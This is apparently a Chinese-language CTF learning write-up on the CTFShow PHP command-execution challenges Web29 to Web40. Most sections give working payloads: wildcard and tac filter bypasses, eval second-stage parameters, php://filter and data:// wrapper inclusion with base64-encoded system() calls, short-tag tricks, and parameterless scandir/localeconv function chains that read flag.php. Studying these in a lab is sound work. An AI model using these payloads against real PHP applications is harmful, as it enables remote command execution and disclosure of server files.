CTFShow命令执行通关笔记：从Web29到Web40的思维跃迁

第一次接触CTFShow的命令执行题目时，我完全是个懵懂的新手。面对Web29简单的过滤规则，我甚至不知道从哪里下手。但随着一道道题目的攻克，我逐渐建立起一套完整的解题思维框架。这篇文章将记录我从Web29到Web40的完整思考过程，而不仅仅是最终的payload。

1. 初识命令执行：Web29-Web31的基础突破

Web29的过滤规则非常简单，只过滤了"flag"这个关键词。我的第一反应是尝试直接读取flag.php：

php复制?c=system('cat flag.php');

当然，这被拦截了。但很快我意识到可以使用通配符和替代命令：

bash复制?c=system('tac f*');

这里学到两个关键点：

1. 通配符可以绕过对完整文件名的检测
2. 替代命令（tac代替cat）可以绕过对特定命令的过滤

Web30增加了对system、php等关键词的过滤，这迫使我寻找其他命令执行函数：

Web31的过滤更加严格，包括空格、分号、括号等。这时我学会了：

• 使用%09（制表符）代替空格
• 通过&拼接参数实现多语句执行
• 利用eval进行二次注入：

php复制?c=eval($_GET[cmd]);&cmd=system("tac f*");

2. 中级挑战：Web32-Web36的编码艺术

当Web32过滤了反斜杠、echo、分号和括号时，传统的命令执行方式几乎全部失效。这时我发现了文件包含的新思路：

php复制?c=include$_GET[cmd]?>&cmd=php://filter/read=convert.base64-encode/resource=flag.php

这个阶段的关键收获是：

1. 伪协议的灵活运用
2. 分号替代：使用?>闭合PHP标签
3. 参数传递：通过GET参数二次注入

Web35引入了对<和=的过滤，迫使我学习Base64编码传输：

php复制?c=include$_GET[cmd]?>&cmd=data://text/plain;base64,PD9waHAgc3lzdGVtKCJ0YWMgZmxhZy5waHAiKTs/Pg==

解码后实际内容：

php复制<?php system("tac flag.php");?>

Web36甚至过滤了数字，这让我意识到字符编码的多样性：

• 使用十六进制编码
• 利用字符串拼接函数
• 探索无数字的编码方式

3. 高级技巧：Web37-Web39的短标签与动态包含

Web37开始使用文件包含而非直接eval，这开启了新的攻击面：

php复制?c=data://text/plain,<?=system("tac f*");?>

这里的关键突破是：

1. 短标签<?=的利用
2. 动态内容生成通过data协议
3. Base64编码绕过特殊字符过滤

Web38过滤了"php"和"file"，迫使我深入理解PHP解析机制：

php复制?c=data://text/plain,<?=system('tac f*');?>

注意：短标签<?=不需要完整的php关键字，这在严格过滤环境下特别有用

4. 终局之战：Web40的无参数读取

Web40几乎过滤了所有特殊字符，这是最艰难的一关。经过大量研究，我发现了无参数函数调用链的技巧：

php复制?c=highlight_file(next(array_reverse(scandir(pos(localeconv())))));

这条语句的精妙之处在于：

1. localeconv()返回本地化信息数组
2. pos()或current()获取数组第一个元素
3. scandir()列出目录文件
4. array_reverse()反转数组顺序
5. next()获取第二个文件(通常是flag.php)
6. highlight_file()输出文件内容

其他可用函数组合：

php复制?c=print_r(show_source(array_rand(array_flip(scandir(current(localeconv()))))));

这个阶段的突破让我真正理解了PHP灵活的函数调用方式，以及如何在不使用任何参数的情况下实现文件读取。

5. 实战思维培养：从解题到方法论

通过这12道题目，我总结出一套系统的解题思路：

1. 信息收集：首先分析过滤规则，明确限制条件
2. 函数替代：寻找未被过滤的等效函数
3. 编码转换：尝试Base64、十六进制等编码方式
4. 协议利用：灵活使用php://、data://等伪协议
5. 特性挖掘：利用PHP语言特性如短标签、变量函数
6. 链式调用：在严格限制下构建无参数调用链

遇到新题目时，我现在的思考流程是：

• 先测试最基本的payload
• 根据错误信息分析过滤规则
• 列出可用函数和字符
• 尝试各种编码和协议
• 必要时组合多个绕过技巧

从最初的茫然无措到现在的系统思考，这12道题目带给我的不仅是技术上的提升，更重要的是培养了一种突破限制的思维方式。在CTF的世界里，没有绝对的安全，只有不断创新的攻防博弈。